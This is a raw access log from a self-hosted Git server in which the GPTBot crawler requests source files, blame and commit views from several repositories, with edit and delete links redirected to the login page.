"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13025] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13640] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12700] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16178] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14303] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile" [Client 74.7.227.38] [Length 11786] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:16:12:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:16:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/package.json" -[17/Feb/2026:16:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11918] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" -[17/Feb/2026:16:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13021] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" -[17/Feb/2026:16:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" -[17/Feb/2026:16:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13020] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" -[17/Feb/2026:16:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html?display=source" [Client 74.7.227.38] [Length 38034] [Gzip 9.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:16:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:16:12:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/package.json" -[17/Feb/2026:16:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/package.json" -[17/Feb/2026:16:12:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/Dockerfile" -[17/Feb/2026:16:12:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/Dockerfile" -[17/Feb/2026:16:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/Dockerfile" [Client 74.7.227.38] [Length 9813] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/Dockerfile" [Client 74.7.227.38] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10312] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10908] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13178] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 11256] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10436] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10608] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10581] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup" [Client 74.7.227.38] [Length 10003] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:16:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10288] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9904] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:16:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:16:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14497] [Gzip 8.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:16:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:16:13:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:16:13:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 